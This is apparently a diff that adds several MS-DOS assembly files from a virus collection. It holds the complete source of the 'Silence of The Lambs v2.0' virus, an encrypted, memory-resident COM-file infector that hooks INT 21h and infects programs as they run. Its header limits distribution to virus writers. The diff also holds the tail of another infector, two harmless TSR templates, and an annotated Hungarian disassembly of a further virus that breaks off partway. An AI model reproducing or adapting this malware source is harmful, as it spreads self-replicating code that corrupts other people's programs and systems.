mov ax,word [00FEh]
|
||||
mov [eof],ax
|
||||
|
||||
mov ah,40h
|
||||
mov dx,100h
|
||||
mov cx,total
|
||||
int 21h
|
||||
|
||||
pop [eof]
|
||||
close:
|
||||
mov ah,3Eh
|
||||
int 21h
|
||||
back:
|
||||
pop ds ;(mov ds,si)
|
||||
add word [0003h],pgfsize
|
||||
back2:
|
||||
push cs
|
||||
pop ds
|
||||
ret
|
||||
|
||||
append:
|
||||
call $+3
|
||||
pop si
|
||||
sub si,3+total
|
||||
mov di,100h
|
||||
mov cx,total
|
||||
rep movsb
|
||||
mov ax,100h
|
||||
push ax
|
||||
ret
|
||||
applen equ $-offset append
|
||||
|
||||
total equ $-100h ;size
|
||||
pgfsize equ ($-100h)/16+2 ;paragraphs needed
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
|
@ -0,0 +1,322 @@
|
|||
; Silence of The Lambs v2.0
|
||||
; (c) -=<: DRE/\MER :>=- of Demoralized Youth 1992
|
||||
;
|
||||
; THIS FILE IS FOR EDUCATION PURPOSES ONLY!
|
||||
; PERMISSION IS GRANTED TO SPREAD THE SOURCE
|
||||
; TO VIRUS WRITERS *ONLY*. PLEASE DO NOT MAKE
|
||||
; ANY MODIFYCATIONS, UNLESS YOU ALSO INCLUDE
|
||||
; THE ORIGINAL SOURCE.
|
||||
;
|
||||
; Assemble With A86
|
||||
;
|
||||
|
||||
org 100h
|
||||
jmp short dummy1
|
||||
db 'DY'
|
||||
dummy1:
|
||||
mov cx,length
|
||||
mov si,offset enc_start
|
||||
mov ah,0
|
||||
enc_key equ $-1
|
||||
dummy2:
|
||||
sub byte [si],ah
|
||||
inc si
|
||||
add ah,0
|
||||
enc_add equ $-1
|
||||
loop dummy2
|
||||
enc_start:
|
||||
mov ah,2Dh
|
||||
mov ch,0FFh
|
||||
mov dx,cx
|
||||
int 21h
|
||||
cmp al,0FFh
|
||||
jne nomore
|
||||
|
||||
mov ax,cs
|
||||
dec ax
|
||||
mov ds,ax
|
||||
cmp byte [0],'Z'
|
||||
jne nomore
|
||||
|
||||
mov ax,word [3]
|
||||
sub ax,pgfsize
|
||||
jc nomore
|
||||
sub word [3],pgfsize
|
||||
sub word [12h],pgfsize
|
||||
|
||||
mov es,word [12h]
|
||||
mov si,110h
|
||||
mov di,100h
|
||||
mov cx,total
|
||||
cld
|
||||
rep movsb
|
||||
|
||||
xor ax,ax
|
||||
mov ds,ax
|
||||
mov si,84h
|
||||
mov di,old21
|
||||
movsw
|
||||
movsw
|
||||
|
||||
cli
|
||||
mov word [84h+2],es
|
||||
mov word [84h],offset ni21
|
||||
sti
|
||||
|
||||
nomore:
|
||||
push cs
|
||||
push cs
|
||||
pop es
|
||||
pop ds
|
||||
|
||||
mov bx,0000h ;return control to the
|
||||
eof equ $-2 ;end user
|
||||
jmp bx
|
||||
|
||||
xclose: jmp close
|
||||
|
||||
infect:
|
||||
push cs
|
||||
pop ds
|
||||
push cs
|
||||
pop es
|
||||
|
||||
db 0E4h,40h
|
||||
mov byte [enc_key],al
|
||||
|
||||
mov ax,4300h ;use CHMOD to get file attr
|
||||
xor dx,dx
|
||||
int 21h
|
||||
|
||||
mov [0F0h],cx ;store attr in PSP
|
||||
|
||||
mov ax,4301h ;clear file attr with CHMOD
|
||||
xor cx,cx
|
||||
int 21h
|
||||
|
||||
mov ax,3D02h ;open file for read / write
|
||||
int 21h
|
||||
xchg bx,ax
|
||||
lahf
|
||||
push ax
|
||||
mov ax,5700h ;get file date & time
|
||||
int 21h
|
||||
|
||||
mov [0F2h],cx
|
||||
mov [0F4h],dx
|
||||
pop ax
|
||||
sahf
|
||||
jc xclose
|
||||
|
||||
mov ah,3Fh ;read from file
|
||||
mov cx,total
|
||||
mov dx,old
|
||||
int 21h
|
||||
|
||||
cmp byte [old+0],'M' ;exe MZ ?
|
||||
je xclose
|
||||
cmp byte [old+0],'Z' ;exe ZM ?
|
||||
je xclose
|
||||
cmp word [old+2],'YD' ;allready infected?
|
||||
je xclose
|
||||
|
||||
mov ax,4202h ;lseek to EOF
|
||||
xor cx,cx
|
||||
xor dx,dx
|
||||
int 21h
|
||||
|
||||
cmp ah,0FAh
|
||||
jae xclose
|
||||
cmp ah,4
|
||||
jb xclose
|
||||
|
||||
add ax,total+100h
|
||||
mov word [00F6h],ax
|
||||
|
||||
mov ah,40h ;write to EOF
|
||||
mov cx,total
|
||||
mov dx,old
|
||||
|
||||
push cx
|
||||
mov al,byte [enc_key]
|
||||
mov si,dx
|
||||
enc_app:
|
||||
xor byte [si],al
|
||||
inc si
|
||||
loop enc_app
|
||||
pop cx
|
||||
|
||||
int 21h
|
||||
|
||||
mov ah,40h ;write to EOF
|
||||
mov cx,applen
|
||||
mov dx,offset append
|
||||
int 21h
|
||||
|
||||
mov ax,4200h ;lseek to beginning of file
|
||||
xor cx,cx
|
||||
xor dx,dx
|
||||
int 21h
|
||||
|
||||
push [eof]
|
||||
mov ax,word [00F6h]
|
||||
mov [eof],ax
|
||||
|
||||
mov ah,byte [enc_key]
|
||||
db 0E4h,40h
|
||||
mov byte [enc_add],al
|
||||
mov dl,al
|
||||
|
||||
mov si,100h
|
||||
mov di,old
|
||||
|
||||
cld
|
||||
mov cx,offset enc_start-100h
|
||||
rep movsb
|
||||
|
||||
mov cx,length
|
||||
enc:
|
||||
lodsb
|
||||
add al,ah
|
||||
stosb
|
||||
add ah,dl
|
||||
loop enc
|
||||
|
||||
mov ah,40h ;write viral code
|
||||
mov dx,old
|
||||
mov cx,total
|
||||
int 21h
|
||||
|
||||
pop [eof]
|
||||
close:
|
||||
mov ax,5701h
|
||||
mov cx,[00F2h]
|
||||
mov dx,[00F4h]
|
||||
int 21h
|
||||
|
||||
mov ah,3Eh ;close file
|
||||
int 21h
|
||||
|
||||
mov ax,4301h
|
||||
mov cx,[00F0h]
|
||||
xor dx,dx
|
||||
int 21h
|
||||
ret
|
||||
|
||||
append:
|
||||
call $+3 ;replace org bytes
|
||||
pop si
|
||||
sub si,3+total
|
||||
mov di,100h
|
||||
mov cx,total
|
||||
mov ah,byte [enc_key]
|
||||
append_enc:
|
||||
lodsb
|
||||
xor al,ah
|
||||
stosb
|
||||
loop append_enc
|
||||
|
||||
mov ax,100h ;return IP to 100h when done
|
||||
push ax
|
||||
|
||||
sub ax,ax ;zero regs
|
||||
xor bx,bx
|
||||
and cx,cx
|
||||
sub dx,dx
|
||||
xor si,si
|
||||
and di,di
|
||||
sub bp,bp
|
||||
|
||||
ret
|
||||
applen equ $-offset append
|
||||
|
||||
ni21:
|
||||
pushf
|
||||
cmp ah,2Dh
|
||||
jne Not_Time
|
||||
cmp ch,0FFh
|
||||
jne Not_Time
|
||||
cmp ch,dh
|
||||
jne Not_time
|
||||
|
||||
mov Al,0
|
||||
popf
|
||||
iret
|
||||
Not_Time:
|
||||
cld
|
||||
push ax
|
||||
push bx
|
||||
push cx
|
||||
push dx
|
||||
push si
|
||||
push di
|
||||
push bp
|
||||
push es
|
||||
push ds
|
||||
|
||||
; cmp ah,41h
|
||||
; jne Not_Parse
|
||||
; mov ah,3Ch
|
||||
; cli
|
||||
; add sp,18
|
||||
; sti
|
||||
; popf
|
||||
; jmp old21-1
|
||||
|
||||
Not_Parse:
|
||||
cmp ax,4B00h
|
||||
jne Not_Exec
|
||||
|
||||
mov si,dx
|
||||
push cs
|
||||
pop es
|
||||
xor di,di
|
||||
mov cx,128
|
||||
rep movsb
|
||||
|
||||
mov ax,3524h
|
||||
int 21h
|
||||
push es
|
||||
push bx
|
||||
|
||||
push cs
|
||||
pop ds
|
||||
|
||||
mov ax,2524h
|
||||
mov dx,offset ni24
|
||||
int 21h
|
||||
|
||||
call infect
|
||||
|
||||
pop dx
|
||||
pop ds
|
||||
mov ax,2524h
|
||||
int 21h
|
||||
|
||||
Not_Exec:
|
||||
pop ds
|
||||
pop es
|
||||
pop bp
|
||||
pop di
|
||||
pop si
|
||||
pop dx
|
||||
pop cx
|
||||
pop bx
|
||||
pop ax
|
||||
popf
|
||||
jmp far 0000:0000
|
||||
old21 equ $-4
|
||||
|
||||
ni24: mov al,0
|
||||
iret
|
||||
|
||||
db 'The Silence Of The Lambs!$'
|
||||
|
||||
total equ $-100h ;size
|
||||
pgfsize equ (($*2)/16)+2
|
||||
length equ $-offset enc_start
|
||||
|
||||
old equ $
|
||||
|
||||
|
||||
|
|
@ -0,0 +1,307 @@
|
|||
|
||||
; NOTE : This template is for .COM files only do not use for .EXE files!!
|
||||
|
||||
|
||||
;
|
||||
;
|
||||
;
|
||||
; Copyright 1986 by Dana Nowell - All rights reserved
|
||||
;
|
||||
; HISTORY:
|
||||
; Version Date Name Description
|
||||
; 1.0 11/10/86 dn first cut
|
||||
; 1.01 11/21/86 dn Fixed memory allocation bug
|
||||
; Added installation message
|
||||
;
|
||||
|
||||
|
||||
title TSR Template
|
||||
|
||||
|
||||
|
||||
NULL equ 00h
|
||||
BELL equ 07h ; bell character
|
||||
BACKSPACE equ 08h ; backspace character
|
||||
TAB equ 09h ; tab character
|
||||
LF equ 0ah ; line feed
|
||||
F_FEED equ 0ch ; form feed
|
||||
CR equ 0dh ; carriage return
|
||||
EOF equ 1ah ; ctrl z ( end of file )
|
||||
SPACE equ ' ' ; ascii space character
|
||||
QUOTE equ '"'
|
||||
|
||||
SIGNATURE1 equ 6144h ; used for already
|
||||
SIGNATURE2 equ 616eh ; resident check
|
||||
|
||||
DOS_INT equ 21h ; DOS function interrupt
|
||||
DISP_CHAR equ 02h
|
||||
GET_KEY equ 08h
|
||||
DOS_SCR_MSG equ 09h
|
||||
DOS_SET_INT equ 25h
|
||||
DOS_RESIDENT equ 31h
|
||||
DOS_GET_INT equ 35h
|
||||
DOS_TERMINATE equ 4ch
|
||||
DOS_STRING_TERM equ '$'
|
||||
|
||||
; Interrupt vectors used
|
||||
|
||||
HOOK_INT equ 1ch ; interrupt to be hooked ( timer tick now )
|
||||
|
||||
;------------------------------------------------------------------------------
|
||||
;
|
||||
; MACRO SECTION
|
||||
;
|
||||
;------------------------------------------------------------------------------
|
||||
|
||||
Version_msg macro
|
||||
jmp short copyright_end
|
||||
|
||||
copyright_msg db CR, LF
|
||||
db 'TSR Shell - Version 1.01', CR, LF
|
||||
db 'Copyright 1986, Dana Nowell ', CR, LF, CR, LF
|
||||
db 'May be distributed without license', CR, LF, '$'
|
||||
copyright_end:
|
||||
Msg copyright_msg
|
||||
endm
|
||||
|
||||
|
||||
Msg macro ptr
|
||||
|
||||
push dx
|
||||
push ax
|
||||
|
||||
lea dx, ptr
|
||||
mov ah, 09h
|
||||
int 21h
|
||||
|
||||
pop ax
|
||||
pop dx
|
||||
|
||||
endm
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
com segment para public 'code'
|
||||
assume cs:com, ds:com, es:com
|
||||
|
||||
;------------------------------------------------------------------------------
|
||||
;
|
||||
; note: The PSP occurs at the beginning of the code segment
|
||||
; for all programs. In COM files the code seg = data seg
|
||||
;
|
||||
;------------------------------------------------------------------------------
|
||||
|
||||
org 0
|
||||
|
||||
psp_start dw ? ; int 20h - possibly a block for unresolved
|
||||
; externals during link ?
|
||||
|
||||
mem_size dw ? ; size of available memory in paragraphs
|
||||
filler db ? ; reserved usually zero
|
||||
|
||||
dos_call db ? ; call
|
||||
dd ? ; address of dos function handler
|
||||
|
||||
term_vector dd ? ; address of dos terminate routine
|
||||
break_vector dd ? ; address of dos break routine
|
||||
error_vector dd ? ; address of dos error routine
|
||||
dos_reserved db 2 dup(?); reserved by dos
|
||||
dos_handles db 20 dup(?) ; file handle array
|
||||
environ_ptr dw ? ; seg of dos environment ( offset = 0 )
|
||||
dos_work db 34 dup(?) ; dos work area
|
||||
|
||||
int_21h db ? ; int
|
||||
db ? ; 21h
|
||||
db ? ; retf ( return far )
|
||||
|
||||
reserved dw ? ; reserved by dos
|
||||
fcb1_ext db 7 dup(?) ; fcb # 1 extension
|
||||
fcb1 db 9 dup(?) ; fcb #1
|
||||
fcb2_ext db 7 dup(?) ; fcb # 2 extension
|
||||
fcb2 db 20 dup(?) ; fcb #2
|
||||
|
||||
;
|
||||
; disk transfer area ( dta ) and parameter block occupy the same space
|
||||
;
|
||||
;
|
||||
;dta db 128 dup(?) ; disk transfer area
|
||||
|
||||
|
||||
|
||||
param_len db ? ; length of parameter string ( excludes CR )
|
||||
parameters db 127 dup(?) ; parameters
|
||||
|
||||
;------------------------------------------------------------------------------
|
||||
;
|
||||
; Note on standard fcb structure :
|
||||
;
|
||||
; The standard FCB is larger than the size reserved in the PSP if you
|
||||
; intend to use to FCB data from the PSP move it to a different location.
|
||||
;
|
||||
;
|
||||
; STANDARD STRUCTURE OF A FILE CONTROL BLOCK
|
||||
;
|
||||
;
|
||||
; extension :
|
||||
; offset length description
|
||||
; -7 1 extension active flag ( 0ffh = active )
|
||||
; -6 5 normally unused should be zeros
|
||||
; -1 1 file attribute when extension is active
|
||||
; 1 . . . . . . . 1 read-only
|
||||
; 2 . . . . . . 1 . hidden
|
||||
; 4 . . . . . 1 . . system
|
||||
; 8 . . . . 1 . . . volume label
|
||||
; 16 . . . 1 . . . . subdirectory
|
||||
; 32 . . 1 . . . . . archive
|
||||
; 64 . 1 . . . . . . unused
|
||||
; 128 1 . . . . . . . unused
|
||||
;
|
||||
; fcb :
|
||||
; offset length description
|
||||
; 0 1 special drive number ( 1 byte )
|
||||
; 0 = default
|
||||
; 1 = a:
|
||||
; 2 = b: etc
|
||||
; 1 8 filename or device name
|
||||
; 9 3 filename extension
|
||||
; 12 2 current block number
|
||||
; 14 2 record size
|
||||
; 16 4 file size in bytes ( dos dir entry at open )
|
||||
; 20 2 file date ( bit coded as in dir )
|
||||
; 22 10 dos work area
|
||||
; 32 1 current record number ( 0 - 127 )
|
||||
; 33 4 random record number
|
||||
;
|
||||
;------------------------------------------------------------------------------
|
||||
|
||||
|
||||
|
||||
org 100h ; required for COM file ( skips PSP )
|
||||
|
||||
|
||||
start:
|
||||
jmp install ; install the demon
|
||||
|
||||
;-------------------------------------------------------------------
|
||||
;
|
||||
; resident data structures go here
|
||||
;
|
||||
;-------------------------------------------------------------------
|
||||
|
||||
old_int dd 0 ; original value of hooked interrupt
|
||||
resident1 dw SIGNATURE1
|
||||
resident2 dw SIGNATURE2
|
||||
|
||||
|
||||
;-------------------------------------------------------------------
|
||||
;
|
||||
; new interrupt starts here
|
||||
;
|
||||
;-------------------------------------------------------------------
|
||||
|
||||
new_int:
|
||||
pushf
|
||||
|
||||
sti ; must turn INT on if we're going to use them
|
||||
|
||||
;-------------------------------------------------------------------
|
||||
;
|
||||
; be well behaved and pass control to original int
|
||||
;
|
||||
;-------------------------------------------------------------------
|
||||
|
||||
popf
|
||||
pushf
|
||||
call dword ptr cs:old_int ; do old interrupt
|
||||
|
||||
iret ; bye bye
|
||||
|
||||
;------------------------------------------------------------------------------
|
||||
;
|
||||
; INSTALLATION DATA STRUCTURES AND CODE GO HERE
|
||||
;
|
||||
; WARNING WARNING WARNING - this area does not exist after installation
|
||||
;
|
||||
;------------------------------------------------------------------------------
|
||||
|
||||
last_resident_byte db 0 ; last resident byte
|
||||
resident_flag dw 0 ; am I already resident ? ( 0 = NO )
|
||||
|
||||
install_msg db CR, LF, 'Installation Complete', CR, LF, '$'
|
||||
|
||||
already_installed_msg db CR, LF
|
||||
db 'Already Installed - Installation Aborted'
|
||||
db CR, LF, '$'
|
||||
|
||||
install proc near
|
||||
|
||||
Version_msg
|
||||
|
||||
|
||||
mov al, HOOK_INT ; int to hook
|
||||
mov ah, DOS_GET_INT ; get int(AL) vector ==> ES+BX
|
||||
int DOS_INT ; do the int
|
||||
lea si, old_int ; where to put old timer interrupt vector
|
||||
mov [si], bx ; save the offset and segment
|
||||
mov 2[si], es ; ( es also used in check resident )
|
||||
|
||||
call check_resident ; am I already resident ?
|
||||
|
||||
cmp resident_flag, 0
|
||||
je not_resident
|
||||
|
||||
Msg already_installed_msg
|
||||
|
||||
mov ah, DOS_TERMINATE ; terminate & stay resident
|
||||
mov al, 1 ; return value is 1 (already installed)
|
||||
int DOS_INT ; bye-bye
|
||||
|
||||
not_resident:
|
||||
mov dx, offset new_int ; offset of new timer interrupt
|
||||
mov al, HOOK_INT ; timer tick
|
||||
mov ah, DOS_SET_INT ; set int(AL) vector from DS+DX
|
||||
int DOS_INT ; do the int
|
||||
|
||||
; program terminate and stay resident
|
||||
|
||||
Msg install_msg ; Display the installation message
|
||||
|
||||
mov dx, offset last_resident_byte
|
||||
|
||||
mov cl, 4 ; convert to paragraphs required to
|
||||
shr dx, cl ; remain resident ( divide by 16 )
|
||||
inc dx ; allow for any remainder of division
|
||||
|
||||
mov ah, DOS_RESIDENT ; terminate & stay resident
|
||||
mov al, 0 ; return value is 0 (good return)
|
||||
int DOS_INT ; bye-bye
|
||||
|
||||
install endp
|
||||
|
||||
|
||||
;
|
||||
; Check resident procedure
|
||||
; requires es register to contain the segment address of
|
||||
; the current location for the interrupt being hooked.
|
||||
; use the DOS function 35h to obtain this information.
|
||||
;
|
||||
|
||||
check_resident proc near
|
||||
|
||||
cmp es:resident1, SIGNATURE1
|
||||
jne not_res
|
||||
cmp es:resident2, SIGNATURE2
|
||||
jne not_res
|
||||
|
||||
mov resident_flag, 1
|
||||
|
||||
not_res:
|
||||
ret
|
||||
|
||||
check_resident endp
|
||||
|
||||
com ends
|
||||
end start
|
||||
|
|
@ -0,0 +1,296 @@
|
|||
;*************************************************************
|
||||
;** Terminate-but-Stay-Resident **
|
||||
;** Original from the "Programmer's Journal" **
|
||||
;** Modified by Alroger L. Gomes Jr. **
|
||||
;** Any comments/question send message for "Roger Gomes" **
|
||||
;** on the PDSE BBS (408)735-7190. Have Fun! **
|
||||
;*************************************************************
|
||||
; Insert you program on line # 157.
|
||||
|
||||
Delay_Count Equ 36 ;36 ticks=approx. 2 seconds
|
||||
|
||||
; Locations of BIOS Data needed by the resident program
|
||||
|
||||
Bios_Data Segment at 40h
|
||||
Org 17h
|
||||
Kbd_Status dw ?
|
||||
Org 6Ch
|
||||
Low_Timer dw ?
|
||||
Bios_Data EndS
|
||||
|
||||
|
||||
Code Segment
|
||||
Assume Cs:Code, Ds:Code, Es:Nothing, Ss:Nothing
|
||||
Org 100h
|
||||
Entry_Point:
|
||||
Jmp Install
|
||||
|
||||
Hot_Keys dw 01010B
|
||||
This_Time dw ?
|
||||
Trig_Time dw ?
|
||||
Dos_Busy Label dword
|
||||
Dos_Busy_Off dw ?
|
||||
Dos_Busy_Seg dw ?
|
||||
Criterr_Flag db ?
|
||||
|
||||
Already8 db 0
|
||||
MenuON db 0
|
||||
|
||||
|
||||
;*** Replacement for Int 24h - critical Dos Error ***
|
||||
Diverted_Int24:
|
||||
Mov Cs:Criterr_Flag,1
|
||||
Xor Al,Al
|
||||
Iret
|
||||
|
||||
Int_24_Vect Label dword
|
||||
Int_24_Off dw ?
|
||||
Int_24_Seg dw ?
|
||||
|
||||
;***** ID CODE *****
|
||||
Res_ID1 dw 'Al'
|
||||
Res_ID2 dw 'ro'
|
||||
Res_ID3 dw 'ge'
|
||||
;*******************
|
||||
|
||||
;*** Replacement for Int 8 - Timer hardware Interrupt ***
|
||||
Diverted_Int8:
|
||||
Pushf
|
||||
Call_Int8 db 09Ah
|
||||
Int_8_Vect Label dword
|
||||
Int_8_Off dw ?
|
||||
Int_8_Seg dw ?
|
||||
|
||||
Cmp Cs:MenuOn,0
|
||||
Je MenuNOT
|
||||
Iret
|
||||
MenuNOT:
|
||||
Mov Cs:MenuOn,1
|
||||
Push Ds
|
||||
Push Bx
|
||||
Lds Bx,Cs:Dos_Busy
|
||||
Cmp Byte Ptr [Bx],0
|
||||
Pop Bx
|
||||
Pop Ds
|
||||
Mov Cs:MenuOn,0
|
||||
Jz Get_Bios_Data
|
||||
Dos_is_Busy:
|
||||
Iret
|
||||
|
||||
;*** Replacement for Int 28 - Generated by Dos, esp. during keyboard I/O ***
|
||||
Diverted_Int28:
|
||||
Pushf
|
||||
Call_Int28 db 09Ah
|
||||
Int_28_Vec Label dword
|
||||
Int_28_Off dw ?
|
||||
Int_28_Seg dw ?
|
||||
Cmp Cs:MenuOn,0
|
||||
Je Get_Bios_Data
|
||||
Iret
|
||||
|
||||
Get_Bios_Data:
|
||||
Mov Cs:MenuOn,1
|
||||
Sti
|
||||
Push Ds
|
||||
Push Ax
|
||||
Mov Ax,Bios_Data
|
||||
Mov Ds,Ax
|
||||
Assume Ds:Bios_Data
|
||||
Mov Ax,Low_Timer
|
||||
Mov Cs:This_time,Ax
|
||||
Mov Ax,Kbd_Status
|
||||
Push Cs
|
||||
Pop Ds
|
||||
Assume Ds:Code
|
||||
Chk_Keys:
|
||||
And Ax,Hot_Keys
|
||||
Cmp Ax,Hot_Keys
|
||||
Jne Back_to_Applic
|
||||
Chk_Timer:
|
||||
Mov Ax,This_Time
|
||||
Cmp Ax,Trig_Time
|
||||
Jb Time_is_Right
|
||||
Sub Ax,Trig_Time
|
||||
Sub Ax,Delay_Count
|
||||
Jnc Time_is_Right
|
||||
|
||||
Back_to_Applic:
|
||||
Pop Ax
|
||||
Pop Ds
|
||||
Mov Cs:MenuOn,0
|
||||
Iret
|
||||
|
||||
Time_is_Right:
|
||||
Mov Ax,This_Time
|
||||
Mov Trig_Time,Ax
|
||||
Pop Ax
|
||||
Pop Ds
|
||||
|
||||
;***************************************************************************
|
||||
; This is the Start of the application-dependent resident code
|
||||
|
||||
Start_Program:
|
||||
Mov Cs:MenuOn,1
|
||||
Push Ax
|
||||
Push Bx
|
||||
Push Cx
|
||||
Push Dx
|
||||
Push Si
|
||||
Push Di
|
||||
Push Bp
|
||||
Push Ds
|
||||
Push Es
|
||||
|
||||
Push Cs
|
||||
Pop Ds
|
||||
|
||||
Mov Ax,3524h
|
||||
Int 21h
|
||||
Mov Int_24_Off,Bx
|
||||
Mov Int_24_Seg,Es
|
||||
Mov Ax,2524h
|
||||
Mov Dx,Offset Diverted_Int24
|
||||
Int 21h
|
||||
|
||||
;****************************************************************************
|
||||
|
||||
; Insert your program here.
|
||||
|
||||
;****************************************************************************
|
||||
|
||||
Restore_Int24:
|
||||
Lds Dx,Int_24_Vect
|
||||
Mov Ax,2524h
|
||||
Int 21h
|
||||
Pop Es
|
||||
Pop Ds
|
||||
Pop Bp
|
||||
Pop Di
|
||||
Pop Si
|
||||
Pop Dx
|
||||
Pop Cx
|
||||
Pop Bx
|
||||
Pop Ax
|
||||
Mov Cs:MenuOn,0
|
||||
Mov Cs:Already8,0
|
||||
Iret
|
||||
|
||||
; This is the end off the applicant-dependent resident code
|
||||
|
||||
End_of_Res Label word
|
||||
|
||||
;***************************************************************************
|
||||
; Installation
|
||||
|
||||
Install:
|
||||
Mov Ax,Cs
|
||||
Mov Ds,Ax
|
||||
Mov Es,Ax
|
||||
|
||||
Mov Ah,9
|
||||
Mov Dx,OffSet CopyRight
|
||||
Int 21h
|
||||
|
||||
; Make sure that it is at least Dos 2.00
|
||||
Mov Ah,30h
|
||||
Int 21h
|
||||
Or Al,Al
|
||||
Jnz Chk_Vectors
|
||||
Mov Dx,Offset BadDos_Msg
|
||||
Mov Ah,9
|
||||
Int 21h
|
||||
Int 20h
|
||||
|
||||
; See if resident code is already Installed in Memory
|
||||
|
||||
Chk_Vectors:
|
||||
Mov Ax,Cs
|
||||
Mov Ds,Ax
|
||||
Mov Es,Ax
|
||||
|
||||
Mov Ax,3508h
|
||||
Int 21h
|
||||
Cmp Word Ptr [Es:Bx-6],'Al'
|
||||
Jne Not_Installed1
|
||||
Cmp Word Ptr [Es:Bx-4],'ro'
|
||||
Jne Not_Installed1
|
||||
Cmp Word Ptr [Es:Bx-2],'ge'
|
||||
Jne Not_Installed1
|
||||
|
||||
Mov Dx,Offset No_Install_Msg
|
||||
Mov Ah,9
|
||||
Int 21h
|
||||
Mov Ax,4C01h
|
||||
Int 21h
|
||||
|
||||
Not_Installed1:
|
||||
Mov Ax,3577h
|
||||
Int 21h
|
||||
Mov Ax,Es
|
||||
Cmp Ax,'Al'
|
||||
Jne Not_Installed
|
||||
Cmp Bx,'ro'
|
||||
Jne Not_Installed
|
||||
|
||||
Mov Dx,Offset No_Install_Msg
|
||||
Mov Ah,9
|
||||
Int 21h
|
||||
Mov Ax,4C01h
|
||||
Int 21h
|
||||
|
||||
Not_Installed:
|
||||
Mov Ax,Cs
|
||||
Mov Ds,Ax
|
||||
Mov Es,Ax
|
||||
|
||||
Push Es
|
||||
Mov Ax,Cs
|
||||
Mov Ds,Ax
|
||||
Mov Es,Ax
|
||||
|
||||
Mov Ah,34h
|
||||
Int 21h
|
||||
Mov Dos_Busy_Off,Bx
|
||||
Mov Dos_Busy_Seg,Es
|
||||
|
||||
Mov Ax,3508h
|
||||
Int 21h
|
||||
Mov Int_8_Off,Bx
|
||||
Mov Int_8_Seg,Es
|
||||
|
||||
Mov Ax,Cs
|
||||
Mov Es,Ax
|
||||
Mov Ds,Ax
|
||||
|
||||
Mov Ax,2508h
|
||||
Mov Dx,Offset Diverted_Int8
|
||||
Int 21h
|
||||
|
||||
Mov Ax,'Al'
|
||||
Mov Ds,Ax
|
||||
Mov Dx,'ro'
|
||||
Mov Ax,2577h
|
||||
Int 21h
|
||||
Mov Ax,Cs
|
||||
Mov Ds,Ax
|
||||
|
||||
Mov Ax,3528h
|
||||
Int 21h
|
||||
Mov Int_28_Off,Bx
|
||||
Mov Int_28_Seg,Es
|
||||
Mov Ax,2528h
|
||||
Mov Dx,Offset Diverted_Int28
|
||||
Int 21h
|
||||
Pop Es
|
||||
|
||||
; Terminate and stay resident
|
||||
Mov Dx,Offset Install
|
||||
Int 27h
|
||||
|
||||
No_Install_Msg db 'xxxx is already in memory!',10,13,10,13,'$'
|
||||
BadDos_Msg db 'DOS 2.0 or greater needed!',10,13,10,13,'$'
|
||||
CopyRight db 'xxxx by ?????? - yyyy $'
|
||||
|
||||
Code EndS
|
||||
End Entry_Point
|
||||
|
|
@ -0,0 +1,324 @@
|
|||
@ virus unassembled list:
|
||||
`90.07.21.
|
||||
|
||||
Magyar zat: K”v ri L szl¢
|
||||
Tel.: (41) 21-822 07-13:20 mh.
|
||||
21-033 18:00-
|
||||
|
||||
|
||||
0EB0:0100 E80000 CALL 0103
|
||||
0EB0:0103 90 NOP
|
||||
0EB0:0104 5E POP SI ;SI=IP b zisc¡m
|
||||
0EB0:0105 50 PUSH AX
|
||||
0EB0:0106 51 PUSH CX
|
||||
0EB0:0107 B82135 MOV AX,3521
|
||||
0EB0:010A CD21 INT 21 ;INT 21h c¡m lek‚rdez‚se
|
||||
0EB0:010C 8CC0 MOV AX,ES
|
||||
0EB0:010E 3D0040 CMP AX,4000 ;mem¢ri ban vam ?
|
||||
0EB0:0111 7220 JB 0133 ;nincs nem 4000h f”l‚
|
||||
;mutat!
|
||||
0EB0:0113 83EE03 SUB SI,+03 ;JMP+op hossza
|
||||
0EB0:0116 BA8601 MOV DX,0186 ;eredeti JMP+op cime
|
||||
0EB0:0119 03F2 ADD SI,DX ;b zishoz
|
||||
0EB0:011B 8B1C MOV BX,[SI]
|
||||
0EB0:011D 8B4C02 MOV CX,[SI+02]
|
||||
0EB0:0120 891E0001 MOV [0100],BX ;eredeti JMP+op.
|
||||
0EB0:0124 890E0201 MOV [0102],CX ;visszarak sa
|
||||
0EB0:0128 8CD8 MOV AX,DS
|
||||
0EB0:012A 8EC0 MOV ES,AX ;ES=DS
|
||||
0EB0:012C 59 POP CX
|
||||
0EB0:012D 58 POP AX
|
||||
0EB0:012E BB0001 MOV BX,0100
|
||||
0EB0:0131 FFE3 JMP BX ;ugr s 0100h-ra igy
|
||||
;lefut az eredeti prg.
|
||||
;Ha nincs a mem¢ri ban
|
||||
0EB0:0133 A10200 MOV AX,[0002] ;PSP-ben a RAM tetej‚nek
|
||||
;paragrafusc¡me
|
||||
0EB0:0136 2D0008 SUB AX,0800
|
||||
0EB0:0139 8EC0 MOV ES,AX ;virus £j szegmens
|
||||
0EB0:013B BF0001 MOV DI,0100
|
||||
0EB0:013E 83EE03 SUB SI,+03 ;JMP+op. hossza
|
||||
0EB0:0141 B90002 MOV CX,0200 ;virus m‚rete
|
||||
0EB0:0144 F3 REPZ
|
||||
0EB0:0145 A4 MOVSB ;virus m sol sa az
|
||||
;£j szegmensbe
|
||||
0EB0:0146 8C06F200 MOV [00F2],ES ;£j szegmensc¡m
|
||||
0EB0:014A B95501 MOV CX,0155 ;£j szegmensben a be-
|
||||
;l‚p‚si offset-je
|
||||
0EB0:014D 890EF000 MOV [00F0],CX
|
||||
0EB0:0151 FF2EF000 JMP FAR [00F0] ;ugr s az £j seg.:0155
|
||||
|
||||
;bel‚p‚si pont
|
||||
0EB0:0155 8CC1 MOV CX,ES
|
||||
0EB0:0157 8CD8 MOV AX,DS
|
||||
0EB0:0159 26 ES:
|
||||
0EB0:015A A38C02 MOV [028C],AX ;r‚gi seg (eredeti
|
||||
;program‚)
|
||||
0EB0:015D B80001 MOV AX,0100
|
||||
0EB0:0160 26 ES:
|
||||
0EB0:0161 A38A02 MOV [028A],AX ;0100h offset
|
||||
0EB0:0164 8CC0 MOV AX,ES
|
||||
0EB0:0166 8ED8 MOV DS,AX ;DS=£j seg
|
||||
0EB0:0168 B82135 MOV AX,3521
|
||||
0EB0:016B CD21 INT 21 ;INT 21h lek‚rdez‚se
|
||||
0EB0:016D 2E CS:
|
||||
0EB0:016E 891E7C02 MOV [027C],BX ;INT 21h offset
|
||||
0EB0:0172 8CC3 MOV BX,ES
|
||||
0EB0:0174 2E CS:
|
||||
0EB0:0175 891E7E02 MOV [027E],BX ;INT 21h segment
|
